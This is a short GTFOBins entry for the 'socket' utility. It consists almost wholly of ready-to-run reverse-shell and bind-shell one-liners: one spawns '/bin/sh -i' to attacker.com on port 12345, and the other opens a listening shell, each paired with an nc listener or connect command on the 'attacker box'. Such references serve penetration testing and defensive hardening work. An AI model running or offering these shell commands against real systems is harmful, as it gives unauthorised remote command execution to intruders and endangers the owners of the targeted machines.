GTFOBins.github.io/_gtfobins/socket.md

404 B

functions
reverse-shell bind-shell
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 socket -qvp '/bin/sh -i' $RHOST $RPORT
description code
Run `nc target.com 12345` on the attacker box to connect to the shell. LPORT=12345 socket -svp '/bin/sh -i' $LPORT